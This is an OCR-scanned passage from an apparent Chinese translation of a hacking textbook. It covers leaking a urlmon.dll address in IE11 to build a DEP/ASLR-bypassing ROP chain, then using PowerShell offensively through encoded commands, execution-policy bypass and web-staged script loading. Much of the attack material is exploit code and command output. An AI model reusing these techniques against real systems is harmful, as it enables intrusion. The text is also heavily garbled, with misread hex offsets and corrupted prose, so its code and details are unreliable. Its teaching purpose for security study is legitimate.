址 被 重 定位 之 前 ， 该 地 址 将 保持 不 变 。 下 面 从 调试 磺 内 部 确认 该 地 址 : 


0:01/» dt 772534504 


CSecurityManager:: vftable' 


下 面 分 析 这 个 地 址 : 


0:017» 'address 77254504 


Usage: 

Base Address: 

End Address: 
Region Size: 
State: 

Protect: 

Type: 

Allocation Base: 
Allocation Protect: 
Image Path: 
Module Name: 
Loaded Image Name: 


Image 
11251000 
11331000 
00060000 
00001000 MEM COMMIT 
00000020 PAGE EXECUTE READ 
01000000 MEM IMAGE 
11250000 
00000080 PAGE EXECUTE WRITECOPY 
C:\Windows \syswow64\urlmon.dll 
urlmon 
C:\Windows \syswow64\urlmon.dll 


可 以 看 到 , 该 地 址 属于 urlmon.dll, 基地 址 是 0x77250000， 74 -SIRVA fif? 0x4504. 


现在 返回 正在 得 看 的 代码 行 : 


var leak = text.value.substring (0,2); 
该 代码 将 刚才 查看 的 前 两 个 Unicode 值 赋 给 变量 leak。 下 一 行 代码 如 下 : 


var hex = parseInt (leak.charCodeAt (1) .toString (16) // Line wrapped below 
+ leak.charCodeAt().toString(16), 16); 


nj ARS rp I) ERE as, 2077 (RAS VR E] https://github.com/rapid7/metasploit- 
framework/blob/master/modules/exploits/windows/browser/ms13 037 svg dashstyle.rb( 
2017 年 4 月 20 日 )。 考 虑 到 内 存 中 的 存储 方式 ， 它 获取 leak 变 量 ， 将 其 从 Unicode 逆 向 
转换 为 十 六 进 制 ， 因 此 值 是 0x77254504， 而 非 0x45047725。 下 面 是 printLeak 函 数 中 


的 最 后 一 行 : 
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text.value = "Leaked address: Ox"+thex.toString (16) 
// Line wrapped below 

+ " - urlmon!CSecurityManager:: vftable'"; 

这 里 ， 只 将 text.value 或 innerHTML 设置 为 泄漏 的 、 转 换 后 的 十 六 进 制 地 址 ， 以 
便 显 示 在 屏幕 的 textarea 位 置 。 劳 边 显示 urlmonICSecurityManager: vftable， 我 们 已 经 
确认 这 是 泄漏 指针 的 目的 地 。 

在 HTML 源 代码 中 也 创建 了 一 个 CButton 对 象 ， 在 单 击 这 个 CButton 对 象 时 执行 
printLeak 函 数 。 图 14-15 和 图 14-16 显 示 了 单 击 按钮 前 后 的 结果 。 


(& CG:\Users\student\Desktop\... X 


&EDEBEZBEDaaaaananaanannaanaanaaanananaaaaanaanaaanaanaanaaaana 


图 14-15 ” 单 击 按钮 前 的 结果 


| 2 C:\Users\student\Desktop\... X 


Leaked address: 0x77254504 - urlmon'C5SecurityManager::'vftable' 


Get Leaked Address 


Kll4-16 单 击 按钮 后 的 结果 
看 起 来 一 切 井 然 有 序 。 现 在 洪 加 和 修改 下 面 的 代码 ， 减 去 RVA 偏 移 Gx4504 来 
计算 基地 址 : 


base address = hex - 0x4504 
text.value = "Leaked address: Ox"- base address.toString (16) 

// Line wrapped below 
+ " - urlmon!CSecurityManager:: vftable'"; 


图 14-17 显 示 SAR. 


| (& G\Users\student\Desktop\... x 


||Leaked address: 0x77250000 - urlmon!CSecurityManager:: vftable' 


图 14-17 修改 后 的 结果 


14.6.4 ”构建 RVA ROP 链 


最 后 使 用 corelanc0d3r 的 mona.py 生 成 一 个 RVA ROP 链 。 虽 然 Mona 可 用 于 
WinDbg , 我 们 将 使 用 Immunity Security I] Immunity Debugger. + Immunity 
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Debugger 连 接 到 IE 11， 执 行 以 下 命令 来 生成 ROP 链 : 
{mona rop -m urlmon.dll -cp nonull -rva 


下 面 是 为 VirtualProtect 生 成 的 一 个 ROP 链 : 


*** [ Python ] *** 
def create rop chain(base urlmon dll): 
# rop chain generated with mona.py - www.corelan.be 
rop gadgets = | 
base urlmon dll + 0x0005fd02, # POP EAX # RETN [urlmon.dl1l] 
base urlmon dll + 0x000eb0d4, # ptr to &VirtualProtect () 
base urlmon dli + 0x0000d89b, # MOV EAX, DWORD PTR DS: [EAX] 4 RETN 
base urlmon dll + 0x00075126, # XCHG EAX, ESI # RETN [urlmon.dll] 
base urlmon dll + 0x0006aa98, # POP EBP # RETN [urlmon.dll] 
base urlmon dll + 0x0003ecd1, i & jmp esp [urlmon.dll] 
0x00000000, # [-] Unable to find gadget to put 00000201 into ebx 
base urlmon dll + 0x000c5942, # POP EAX # RETN [urlmon.dll] 
0xa03c7540, # put delta into eax (-» put 0x00000040 into edx) 
base urlmon dll + 0x0002b801, # ADD EAX,5FC38BO00 # POP ESI # POP EBX 
0x41414141, # Filler (compensate) 
0x41414141, # Filler (compensate) 
base urlmon dll + 0x0003da04, # XCHG EAX, EDX f RETN [urlmon.dll| 
0x41414141, # Filler (RETN offset compensation) 
0x41414141, # Filler (RETN offset compensation) 
base urlmon dll + 0x0004blaa, i POP ECX # RETN [urlmon.dll] 
base urlmon dll + 0x000e273d, # &Writable location [urlmon.dll] 
base urlmon dll + 0x0005ff35, # POP EDI # RETN [urlmon.dll] 
+ 0x00049dc2, 4 RETN (ROP NOP) [urlmon.dll] 
base urlmon dll + 0x000c5946, # POP EAX # RETN [urlmon.dll] 
0x90909090, # nop 
base urimon dll + 0x00006173, # PUSHAD # ADD EAX, 8B5E5F00 
] 


return ''.join(struct.pack('«I', ) for in rop gadgets) 


base urlmon dll 


# [urlmon.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v11.00 
base urlmon dll = 0x7/52f0000 
rop chain = create rop chain(base urlmon dll) 
看 起 来 只 找到 一 个 指令 片段 。 现 在 缺少 将 0x201 放 入 EBX 以 用 作 VirtualProtect 的 
size 参 数 的 指令 片段 。 要 解 决 这 个 问题 ， 只 需要 得 找 要 补偿 的 指令 片段 。 快 速 浏览 ， 
可 快速 找到 并 添加 以 下 指令 片段 : 


xor eax, eax # Zero out EAX 

retn 

add eax, 1c i Rerun this as many times as needed to reach 0x201 
retn i There are likely other values besides Oxlc 
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inc eax 
retn 


push eax 
retn 


pop ebx 
retn 


第 14 章 高 级 的 Windows 漏洞 攻击 


# If necessary to increment by 1 


i Push the value destined for EBX onto the stack 


# Get the value into EBX 


可 通过 多 种 方式 完成 这 个 目标 。 在 本 例 中 , 因为 EAX 需 要 反问 引用 VirtualProtect 
的 IAT 项 ， 然 后 将 其 与 ESI 交 换 ， 所 以 需要 重新 对 指令 片段 排序 ， 如 ROP 链 的 第 一 部 
分 所 示 。 现 在 ， 只 需要 获取 具有 未 解析 指令 片段 的 ROP 链 ， 将 其 添加 到 内 存 泄 漏 
HTML 文 件 以 演示 这 一 点 。 以 下 脚本 在 一 定 程 度 上 古 多 余 的 , 但 可 以 过 过 这 上 段 脚本 ， 
看 到 如 何 将 RVA 偏 移 添 加 到 已 恢复 的 基地 址 上。 下面 是 更 新 的 Final leaked.html 文 件 


的 一 部 分 : 


function getRopChain() { 


b = document.createEkEblement ("form"); 
b.style.fontFamily = "Courier New"; 
document.body.appendChild (b); 

var gl = base address 十 Oxofd02; 
var g2 = base address + Oxeb0d4; 
var g3 = base address + Oxd89b; 
var g4 = base address + 0x/51260; 
var gy = base address + 0x6aa998; 
var go = base address + Ox3ecdl1; 
var g/ = 0x00000000; 

var g8 = base address + 0xc59427; 
var g9 = 0xa03c7540; 

var glO0 = base address + 0x2b801; 
var gll = 0x41414141; 

var gl2 = 0x41414141; 

var gl3 = base address + 0x3da04; 
var gl4 = 0x41414141; 

var gl15 = 0x41414141; 

var glo = base address + Ox4blaa; 
var gl/ = base address + Oxe27/3d; 
var gl8 = base address + Ox5ff35; 
var gl19 = base address + 0x49dc2; 
var g20 = base address + 0xc 3946; 
var g21 = 0x90909090; 

var g22 = base address + 0x6173; 


可 以 看 到 ， 此 处 使 用 泄漏 的 基地 址 和 Mona 的 RVA 偏 移 来 创建 指令 片段 变量 。 还 
创建 了 另 一 个 按钮 ， 以 显示 内 存 泄漏 后 生成 的 ROP 链 。 与 上 面 一 样 ， 这 完全 没有 必 


了 解 如 何 计 算 最 终 地 址 。 图 14-18 和 图 14-19 显 示 了 运行 
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结果 。 图 14-20 显 示 了 完整 的 ROP 链 。 


(S C\Users\student\Desktop\... X 


H Ë E Bg E [BF 1-0 3-1-1-3-1-1-9-1-1-9-5- 1-3. 1-0-3- 9-5: 3-1-3- 3-1 1-3-1-3-3-1-3-3- 1-9-3-1- 3-1 1 1-3- 1- 1- 3- 1-1-3- T. di. 


Get Leaked Address 


图 14-18 ”运行 结果 


(& C:\Users\student\Desktop\... X 


Ox77254504 CSecurityManager:: vitable" 
0x77250000 {Leaked address - RVA 024504) 


Leaked address: 
(Base address: 


Get Leaked Address | 


Get ROP Chain 


图 14-19 ”创建 另 一 个 按钮 


0277254504 
0x77250000 


CSecurityManager::' vftable' 
(Leaked address = BVA 024504) 


Leaked address: 
Base address: 


Get Leaked Address 
| Get ROP Chain | 


ROP Chain 


- RVA Chain created with Mona.py from corelancOd3r... 
- RVA's added to leaked base address: 77250000 


0x77250000 + RVA Offset: OxSfd02 
0x77250000 + RVA Offset: ÜxebÜ0d4 
0x77250000 + RVA Offset: 
0x75126 


772afd02 
J733b0d4 
1725d89b 


POP FAX # RETN [IAT urlmon.dll] @ Base: 
ptr to £VirtualProtect [IAT urlmon.d11] 8 Base: 


MOV EAX,DWORD PTR DS:[EAX] # RETN [urlmon.dll] @ Base: Oxd8 Sb 


77205126 
772baa98 
7728ecdl 
00000000 
77315942 
a03c7540 
J1!27!b8501 
41414141 
41414141 
7728da04 
41414141 
41414141 
1!Z9blaa 
J733273d 
Jidatf3b5 
J7299dcz 
77315946 
90909090 
77256173 


XCHG EAX,ESI # RETN [urlmon.dll] 8 Base: 0x77250000 + RVA Offset: 
POP EBF # RETN [urlmon.dll] 8 Base: 0x77250000 + RVA Offset: 0x6aa38 
& jmp esp [urlmon.dll] @ Base: 0x77250000 + RVA Offset: Ox3ecdl 

[-] Unable to find gadget to put 00000201 into ebx 

POP EAX # RETN [urlmon.dll] @ Base: 0x77250000 + RVA Offset: 
put delta into eax [-> put 0x00000040 into edx] 

ADD EAX,5FC38B00 # POP ESI £4 POP EBX $ RETN 0x08 [urlmon.dll] 68 Base: 
Filler 

Filler 

XCHG EAX,EDX # RETN [urlmon.dll] @ Base: 
Filler 
Filler 
POP ECX # 
&Writable 
POP EDI # 
RETN (ROP 
POP EAX # 
nop 
PUSHAD # ADD EAX,8B5E5F00 # RETN [urlmon.dl11] @ Base: 


图 14-20 ”完整 的 ROP 链 


0xc5542 


Ox!7250000 + RVA Offset: OxZzbBOIl 


0x77250000 + RVA Offset: Ox3da04 


0x//250000 + RVA Offset: Ox4blaa 
0x77250000 + RVA Offset: Oxe273d 
Üüx5ff35 
Ox49de2 
üxc5946 


RETN [urlmon.dll] 8 Base: 


[urlmon.d11] 8 Base: 
0x77250000 十 RVA Offset: 
0x77250000 十 RVA Offset: 
0x77250000 十 RVA Offset: 


location 
RETN [urlmon.dll] @ Base: 
NOP) [urlmon.dl11] 8 Base: 
RETN [urlmon.dll] 8 Base: 


0x77250000 十 RVA Offset: 0x6173 


此 时 ， 需 要 修复 一 个 ROP 指 令 厂 段 ， 然 后 将 其 与 男 一 个 缺陷 结合 起 来 以 控制 指 


令 指 针 。 这 和 留 作 练习 。 强 烈 建议 灰 帽 黑客 们 分 析 前 面 提 到 的 由 Claudio Moletta 完 成 
的 工作 。 
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14.7 kx 


本 童 简要 介绍 了 几 种 第 见 的 攻击 反 制 技术 : DEP 和 ASLR。 然后 其 于 第 13 章 介绍 
的 SSH 漏 洞 攻击 程序 ， 对 其 加 以 修改 ， 用 Mona 生 成 的 ROP 链 禁用 DEP， 通 过 使 用 非 
基 址 重 定 位 模块 绕 过 ASLR。 最 后 详细 介绍 了 如 何 通过 由 Ivan FratricAc SITE 11 中 的 
内 丰 浴 漏 缺 陷 ， 完 全 绕 过 ASLR。 我 们 在 一 个 实用 的 例子 中 对 其 进行 武 占 化 ， 以 便 
在 对 所 有 模块 进行 基 址 重 定位 时 ， 绕 过 DEP。 此 类 技术 在 当今 已 趋 标准 化 ， 随 着 反 
制 撤 术 的 改进 ， 新 的 攻击 技术 也 在 不 断 发 展 。 
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大 多 数 公 司 的 系统 都 基于 Windows， 因 此 灰 帽 黑客 必须 熟练 掌握 Windows 系 统 
中 的 可 用 工具 。 其 中 ， 最 强大 的 工具 之 一 是 PowerShell。 本 章 将 介绍 PowerShell 如 此 
强大 的 原因 ， 并 分 析 如 何 通 过 一 些 方法 将 PowerShell 用 作 漏 洞 攻 击 工 具 箱 的 一 部 分 。 


AK SS SS AYE GOT : 

e 为 什么 使 用 PowerShell 

e 加 载 PowerShell 脚 本 

e 使 用 PowerShell 创 建 shell 

e PowerShell 延 伸 攻 击 (Post Exploitation) 


151 为 什么 使 用 PowerShell 


虽然 PowerShell 语 言 一 直 用 于 文 持 Windows 系 统 上 自动 化 ， 但 PowerShell 也 给 黑客 
留 下 可 乘 之 机 。PowerShell 允 许 宦 理 员 以 编程 方式 访问 几乎 所 有 的 Windows 功 能 ， 而 
且 是 可 扩展 的 ， 可 用 于 管理 活动 目录 、 电 子 邮件 系统 、SharePoint 和 工作 站 等 。 
PowerShell 还 允许 利用 脚本 访问 .NET 库 ， 是 可 在 Windows 环 境 中 使 用 的 最 灵活 的 工 
Lr 


15.1.1 利用 现 有 资源 


我 们 可 以 利用 系统 中 己 有 的 工具 来 进一步 发 动 攻击 。 这 是 十 分 有 价值 的 做 法 ， 
每 当 在 系统 中 增加 文件 时 ， 被 友 现 的 可 能 性 束 会 增加 ; 另外 ， 如 采 在 系统 里 遗留 工 
A, 工具 可 能 泄露 黑客 攻击 的 战术 、 技 术 和 过 程 (Tactics, Techniques, and Procedures, 
TIP)， 因 此 更 容易 在 其 他 系统 中 友 现 黑客 的 活动 。 而 利用 现 有 资源 ， 则 可 以 减少 工 
具 数 量 ， 减 少 必须 从 一 个 系统 移 到 男 一 个 系统 的 工具 。 

作为 系统 中 的 一 个 已 有 工具 ，PowerShell 十 分 有 用 ; 使 用 PowerShell， 我 们 可 方 
全 地 编写 脚本 并 集成 .NET， 这 样 ， 在 .NET 中 编写 的 所 有 代码 几乎 都 可 在 PowerShell 
中 编写 。 这 意味 看 ， 测 试 人 员 可 超越 基本 的 脚本 ， 真 正 与 内 核 函 数 等 进行 交互 ， 这 
给 测试 人 员 市 来 更 大 的 灵活 性 , 这 种 灵活 性 原本 需要 使 用 各 种 单独 的 程序 才能 获得 。 

PowerShell 的 一 个 重要 好 处 在 于 , 可 以 使 用 Intermet Explorer 选 项 ， 因 此 诸如 代理 
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文 持 之 类 的 选项 被 内 置 到 PowerShell 中 。 因此 ,可 以 使 用 内 置 的 Web 库 从 远程 加 载 代 
码 ， 这 意味 痢 不 必 将 任何 代码 下 载 到 目标 系统 。 所 以 ， 当 得 看 文件 系统 的 历史 信息 
时 ， 从 网 站 获取 的 代码 不 会 显示 出 来 这样， 黑客 的 行动 更 加 隐 熙 。 


15.12 PowerShellH mics 


在 PowerShell 的 早期 版 本 (4.0 之 前 ) 中 ,， 只 能 使 用 很 少 的 几 个 日 忘记 录 选 项 。 恶 意 
黑客 在 利用 PowerShell 操 作 时 不 会 产生 很 多 日 总 告警 ， 也 使 取证 人 员 难 以 确定 恶意 
黑客 做 了 什么 。 旧 版 本 中 ， 唯 一 真正 显示 的 日 志 记 录 选 项 是 “加 载 了 PowerShell” 
diens 而 新 版 本 的 PowerShell 增 加 了 和 选项， 增强 了 PowerShell 日 志 记 录 能 力 。 因 

E， 当 攻击 目标 是 最 新 的 Windows 版 本 时 ， 使 用 PowerShell 可 能 会 比 在 旧版 本 
eari A. 


GA 注意 : 本 章 只 介绍 PowerShell 会 影响 “黑客 攻击 检测 ”的 日 志 记 录 方 面 。 
\ 富 ”要 了 解 更 多 信息 , 可 访问 FireEye 提 供 的 参考 信息 ， 其 中 详细 列 出 了 不 同 选 
项 ， 并 解释 了 如 何 司 用 它们 。 


1. 模块 日 志 记 录 


模块 日 志 记 录 (Module Logging) 会 司 用 多 个 功能 , 来 记录 加 载 了 哪些 脚本 以 及 执 
行 了 哪些 功能 的 基本 信息 。 这 包括 加 载 了 哪些 模块 和 变量 , 甚至 包括 一 些 脚 本 信息 。 
在 运行 PowerShell 脚 本 时 ， 这 项 日 志 记 录 功 能 极 大 地 提高 了 详细 程度 ， 不 过 ， 信 县 
量 过 大 ， 可 能 会 使 管理 员 无 所 适 从 。PowerShell v3.0 引 入 了 模块 日 志 记 录 功 能 ， 默 
认 不 局 用 ; 如 果 要 局 用 模块 日 志 记 录 功 能 ， 和 需要 在 系统 上 局 用 组 集 略 对 象 (Group 
Policy Object, GPO). 

虽然 此 类 日 志 记 录 人 允许 更 好 地 了 解 运行 历 ea 这 些 日 志 并 不 
提供 实际 运行 的 代码 。 因 此 ， 要 进行 取证 调查 ， 这 个 日 志 记 录 级 别 仍然 不 能 满足 要 
求 。 但 是 ， 日 志 记录 会 使 取证 人 员 henner de ， 但 具体 细 市 很 可 能 3 
没有 被 记录 下 来 。 


2. 脚本 块 日 志 记 


脚本 块 日 志 记 录 (Script Block Logging，SBL) 用 于 记录 脚本 块 的 执行 时 间 ， 人 允许 
更 深入 地 了 解 真 正 执行 的 脚本 。 从 PowerShell v5.0 开 始 ， 肢 本 块 日 忘记 录 提 供 有 关 
可 疑 事 件 的 大 量 数据 ， 使 取证 人 员 有 了 入 手 之 处 。 

记录 的 条 目 包括 使 用 cool 动 的 脚本 以 及 执行 的 基本 混 消 操 
作 。 因 此 ， 当 局 用 脚本 块 日 志 记 录 功 能 时 ， 防 御 者 可 更 深入 地 了 解 细节 。 对 于 系统 
HIERA, MER H 志 记 录 是 一 个 比 模块 日 志 记 录 更 好 的 解决 方案 ， 因 为 SBL 突 
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出 了 从 取证 人 员 的 角度 看 可 能 关心 的 问题 , 而 同时 也 不 会 造成 太 多 的 日 志和 解析 负担 。 


15.1.3 PowerShell 的 可 移植 性 


PowerShell 的 一 个 腕 点 在 于 ， 模 块 是 可 移植 的 ， 可 通过 不 同方 式 加载 。 这 个 特 
性 允许 系统 管理 员 加 载 系统 安装 模块 以 及 其 他 位 置 的 模块 。 系 统管 理 员 还 可 从 服务 
4a iH (Server Message Block，SMB) 共 享 以 及 Web 加 载 模块 。 

为 什么 远程 加 载 如 此 有 价值 呢 ? 恶意 攻击 者 想 留 下 尽 可 能 少 的 痕迹 ， 和 恶意 攻击 
者 想 要 重复 尽 可 能 少 的 工作 。 这 意味 看 可 以 把 经 贡 使 用 的 东西 放 在 SMB 分 享 或 一 个 
网 站 上 以 供 使 用 。 因 为 脚本 是 文本 ， 无 须 担心 二 进 制 或 类 似 文 件 类 型 的 块 。 当 然 ， 
也 可 以 混淆 代码 ， 并 在 使 用 时 解码 。 这 样 可 以 让 绕 过 杀毒 (AV) 变 得 更 加 容易 。 

脚本 只 是 文本 ， 因 此 ， 脚 本 几乎 可 从 任何 位 置 引 用 。 一 般 而 言 ， 诺 如 GitHub 的 
代码 站 点 以 及 很 多 商业 站 点 都 是 从 事 此 类 活 动 的 便利 场所 。 测 斌 人员 可 将 脚本 添加 
到 存储 库 中 , 或 使 用 基本 gist 命 令 从 PowerShell 环 境 加 载 并 局 动 其 他 活动 。PowerShell 
甚至 可 使 用 用 户 的 代理 设置 ， 因 此 ， 这 是 在 环境 中 长 期 潜伏 下 来 的 最 佳 方式 。 
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在 使 用 PowerShell 进 行 任何 漏洞 攻击 之 前 ， 需 要 了 解 如 何 执行 脚本 。 在 大 多 数 
环境 中 ， 默 认 不 允许 使 用 未 签名 的 PowerShell 脚 本 。 灰 帽 黑客 要 分 析 这 种 行为 ， 以 
便 理 解 、 识 列 并 最 终 绕 过 控制 指 施 ， 进 而 可 以 局 动 任何 想 要 运行 的 代码 。 


1521 实验 15-1: 攻击 条 件 


在 分 析 如 何 绕 过 安全 防线 前 ， 需 要 分 析 正 在 使 用 的 安全 防御 手段 。 为 此 ， 在 第 
10 章 设置 的 Windows 10 box 中 构建 一 个 十 分 简单 的 脚本 ， 然 后 符 试 执行 该 脚本 。 在 
这 个 脚本 中 ， 将 创建 Cx\ 的 根 目录 清单 。 衣 先 以 系统 管理 员 身 份 打开 命令 提示 窗口 ， 
然后 运行 以 下 代码 : 


c:\Users\User\Desktop>echo dir C:\ > test.psl 
c:\Users\User\Desktop>powershell .\test.psl 
powershell .\test.psl 
.\test.psl : File C:\Users\User\Desktop\test.psl cannot be loaded 
because running scripts is disabled on this system. 
For more information, see about Execution Policies at 
http://go.microsoft.com/fwlink/?LinkID-135170. 
At line:1 char:1 
+ .Ntest.ps1 
"— 
+ CategoryInfo : SecurityError: (:) [], PSSecurityException 
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+ FullyQualifiedErrorld : UnauthorizedAccess 
在 这 里 可 看 到 ， 测 试 使 用 的 test.ps1 脚 本 执行 受阻 ， 原 因 是 已 经 在 系统 上 茶 用 脚 
本 的 运行 。 下 面 分 析 当 前 的 执行 策略 : 


c:\Users\User\Desktop>powershell -command Get-ExecutionPolicy 
powershell -command Get-ExecutionPolicy 
Restricted 


这 表明 当前 执行 策略 是 Restricted。 表 15-1 分 析 了 每 种 可 能 的 执行 策略 。 


表 15-1 PowerShell 执 行 策略 


Rag 说 明 
Restricted 只 能 运行 系统 PowerShell 命 令 。 要 运行 目 定义 命令 ， 只 能 使 用 交互 
ol 
AllSigned MEM 者 签名 的 所 有 脚本 都 可 运行 。 这 人 允许 公司 和 第 三 方 给 脚本 


， 从 而 使 脚本 能 够 运行 
RemoteSigned = 有 可 信友 布 者 等 名 的 己 下 载 脚 本 才能 运行 
Unrestricted 不 受 限 制 。 无 论 从 哪里 获得 脚本 ， 也 无 论 如 何 获 得 脚本 ， 都 允许 运行 


下 面 答 试 将 执行 案 略 更 改 为 Unrestricted， 然 后 再次 运行 testps1 脚 本 : 


c:\Users\User\Desktop>powershell -com Set-ExecutionPolicy Unrestricted 
powershell -com Set-ExecutionPolicy Unrestricted 
c:\Users\User\Desktop>powershell -command Get-ExecutionPolicy 
powershell -command Get-ExecutionPolicy Unrestricted 
c:\Users\User\Desktop>powershell .\test.psl 
powershell .\test.psl 

Directory: C:\ 


可 以 看 到 ， 一 旦 将 策略 更 改 为 Unrestricted， 脚 本 将 正常 运行 。 根 据 表 1$-1 中 的 
介绍 ，RemoteSigned 策 略 好 像 也 可 行 ， 可 以 答 试 一 下 : 


c:\Users\User\Desktop>powershell -com Set-ExecutionPolicy RemoteSigned 
powershell -com Set-ExecutionPolicy RemoteSigned 


c:\Users\User\Desktop>powershell -command Get-ExecutionPolicy 
powershell -command Get-ExecutionPolicy 
RemoteSigned 
c:\Users\User\Desktop>powershell .\test.psl 
powershell .\test.psl 
Directory: C:\ 


RemoteSigned 策 略 也 能 奏效 。 从 理论 上 讲 ， 可 将 执行 策略 设置 为 这 两 个 值 中 的 
一 个 。 遗 憾 的 是 ， 在 很 多 环境 中 ， 该 值 由 组 策略 强制 实施 。 在 此 类 情形 中 ， 更 改 策 
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上 略 并 不 容易 。 因 此 ， 如 下 所 示 ， 将 值 改 回 Restricted; 在 本 章 剩余 的 内 容 中 ， 会 司 用 
这 个 最 严格 的 控制 功能 。 


c:\Users\User\Desktop>powershell -com Set-ExecutionPolicy Restricted 
powershell -com Set-ExecutionPolicy Restricted 


15.22 实验 15-2: 在 命令 行 上 传递 命令 

在 实验 1$-1 中 ， 已 经 从 命令 行 执 行 了 大 量 PowerShell 命 令 。 在 这 个 实验 中 ， 将 分 
析 如 何 执行 更 复杂 的 命令 。 在 实验 1$-1 中 可 看 到 ，-command 选 项 可 用 于 在 命令 行 上 
传递 命令 ; 但 很 多 PowerShell 选 项 都 可 以 缩短 。 如 下 所 和 示 ， 这 里 可 使 用 -com， 以 减 


少 输 入 量 : 


c:\Users\User\Desktop>powershell -com Get-WmiObject win32 computersystem 
powershell -com Get-WmiObject win32 computersystem 


Domain : WORKGROUP 

Manufacturer : VMware, Inc. 

Model : VMware Virtual Platform 
Name : DESKTOP-KRB3MSI 
PrimaryOwnerName : Windows User 


TotalPhysicalMemory : 8694255616 


X E Be fis PowerShell jy — f&j LA WMI, ARES frigis ue Es 
号 。 对 于 简单 查询 而 言 ， 这 是 可 行 的 ， 但 对 于 复杂 得 询 ， 将 遇 到 问题 。 下 面 看 一 下 ， 
当 尝 试 获取 拥有 系统 的 用 户 的 更 多 信息 时 ， 会 发 生 什 么 。 

c:\Users\User\Desktop>powershell -com Get-WmiObject 

win32 computersystem | select Username 

powershell -com Get-WmiObject win32 computersystem | select Username 

'select' is not recognized as an internal or external command, 

operable program or batch file. 

TEXX HF GB, AN BEA AL I ETT (LG A 77 AS 7 iE. WI 
为 这 需要 由 操作 系统 解释 。 最 简单 的 变通 方式 是 使 用 双 引号 ， 如 下 所 示 : 

c:\Users\User\Desktop>powershell -com "Get-WMIObject 

win32 computersystem | select Username" 


powershell -com "Get-WMIObject win32 computersystem | select Username" 
Username 


DESKTOP-KRB3MSI1\User 


XK, IPFA ERT E ARE, LE MA WMI) FFL RAP 4f 


321 


第 川 部 分 de Geb DX ou 


轧 。 对 于 简单 命令 而 言 ， 这 是 可 行 的 。 如 果 只 是 使 用 这 样 几 个 命令 ， 可 以 方便 地 将 
它们 洪 加 到 批 处 理 脚本 中 并 运行 。 


1523 实验 15-3: 编码 的 命令 


在 处 理 更 复杂 的 任务 时 ， 如 采 不 需要 考 碟 格式 ， 那 将 是 一 件 很 好 的 事情 。 
PowerShell 有 一 个 简便 模式 ， 只 要 脚本 不 是 过 长 ， 允 许 将 Base64 编 码 的 字符 串 作 为 
脚本 进行 传递 并 运行 。Windows 命 令 行 命 令 的 总 长 度 约 为 8 000 个 字符 ， 因 此 ，8 000 
个 字符 就 是 上 限 。 

为 了 创建 编 公 的 命令 , 必须 执行 几 处 更 改 。 首 先 , PowerShell 的 encodedcommand 
选项 使 用 Base64 编 码 的 Unicode 字 符 串 ， 因 此 首先 需要 将 文本 转换 为 Unicode， 人 然后 
编 伺 为 Base64。 为 此 ， 需 要 采用 一 种 方便 的 方式 将 其 转换 为 Base64 编 码 。 虽 然 可 使 
用 Kali 的 已 有 工具 ， 但 这 里 将 使 用 由 Eric Monti 开 发 的 名 为 Ruby BlackBag 的 工具 箱 。 
Ruby 工 具 箱 包含 大 量 的 编码 和 解码 工具 ,可 帮助 完成 恶意 软件 分 析 以 及 恶意 黑客 攻 
dro FETE ZH, tim Ruby LAF 

root@kali:~/Ch1i5# gem install rbkb 

Fetching: rbkb-0.7.2.gem (100%) 

Successfully installed rbkb-0.7.2 

Parsing documentation for rbkb-0.7.2 


Installing ri documentation for rbkb-0.7.2 
Done installing documentation for rbkb after 1 seconds 


1 gem installed 


在 安装 了 这 个 工具 箱 之 后 ， 不 仅 添加 了 Ruby 功 能 ， 还 创建 了 一 些 帮助 脚本 ， 其 
中 一 个 是 b64， 它 古 一 个 Base64 转 换 工 具 。 接 下 来 使 用 上 一 个 实验 提 到 的 命令 , 将 其 
转换 为 符合 PowerShell 标 准 的 Base64 字 符 串 : 

root8kali:-/Ch154 echo -n "Get-WMIObject win32 computersystem | 

select Username" | iconv -f ASCII -t UTF-16LE | b64 

RwBlAHOALOBXAEOASOBPAGIAagBlIAGMAdAAqAHCAaQBuADMAMgBf AGMAbwBLtAHAAd 

OBOAGUACgBzAHkACWBOÜAGUADQAgAHWAIABZAGUADABlIAGMAdAAgAPFUACWBlIAHIAbDbq 

BhAGOAZQA- 

ix H fii FHechodl-nieJjio té zs PowerShellis 4, ANZSI. Fe PRG Ae 
给 iconv，iconv 是 一 个 字符 集 转换 占 ， 用 于 将 ASCII 文 本 转换 为 UTF-16LE(Windows 
Unicode 格 式 )。 最 后 将 这 些 传递 给 5864， 如 下 所 示 ， 输 出 的 字符 串 正 是 我 们 要 用 于 
PowerShell 的 字符 串 : 

c:\Users\User\Desktop>powershell -enc RwBlAHQALOBXAEOASQBPAGIAagBlA^ 

GMAdAAqAHcAaQBuADMAMgBf AGMAbwBUEAHAAdOBÜAGUACqBzAHkAcwBOAGUAbOQAGAHwAT ^ 


ABzAGUAbABIAGMAdAAgAFUACWBlIAHIAbgBhAGOAZQA- 
Username 
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DESKTOP-KRB3MSI\User 


从 这 里 可 看 到 ， 当 使 用 -enc 选 项 传递 字符 串 时 ， 将 获得 所 需 的 输出 结果 。 现 在 ， 
必须 构建 更 复杂 的 脚本 ， 在 命令 行 上 传递 整个 脚本 ， 这 样 就 不 必 考 虑 脚本 执行 受阻 
的 问题 了 。 


1524 实验 15-4: 通过 Web 启 动 


对 于 复杂 脚本 而 言 ， 进 行 编码 未 必 是 最 佳 做 法 。 另 一 个 选项 是 将 脚本 放 在 网 站 
上 ， 加 载 脚 本 ， 然 后 在 代码 中 局 动 。PowerShell 中 的 函数 Invoke-Expression 和 
Invoke-WebRequest 可 帮助 完成 这 项 任务 。 

Invoke-WebRequest 将 访问 并 获取 网 足 ， 返 回 网 页 的 内 容 。 这 样 就 可 在 互联 网 上 
放置 一 个 包含 代码 的 页 面 ， 然 后 再 从 PowerShell 获 取 。 这 个 函数 默认 使 用 正 引 擎 ， 
而 Windows 10 box 并 不 包含 该 引擎 。 因 此 ， 必 须 采 用 一 种 变通 方法 ， 确 保 能 够 获取 
网 页 。 可 使 用 -UseBasicParsing 选 项 告诉 该 函数 不 要 分 析 结 果 ， 只 是 返回 内 容 。 

Invoke-Expression 范 数 评估 传递 给 它 的 代码 。 可 从 文件 加 载 代码 ， 再 通过 stdin 
或 另 一 个 选项 传递 它 。 恶 意 攻 击 者 最 章 用 的 一 种 方法 是 将 Web 请 求 的 输出 传 给 
Invoke-Expression 函 数 ， 使 它们 可 在 更 大 的 程序 中 局 动 ， 而 不 必 考 虑 脚本 阳 老 。 

首先 将 命令 复制 到 Web 根 目录 中 ， 并 确保 Apache 正 在 运行 : 


root8kali:-/Ch154 echo "Get-WMIObject win32 computersystem | 
select Username" > /var/www/html/t.psl 


rootG8kali:-/Ch154 service apache2 start 


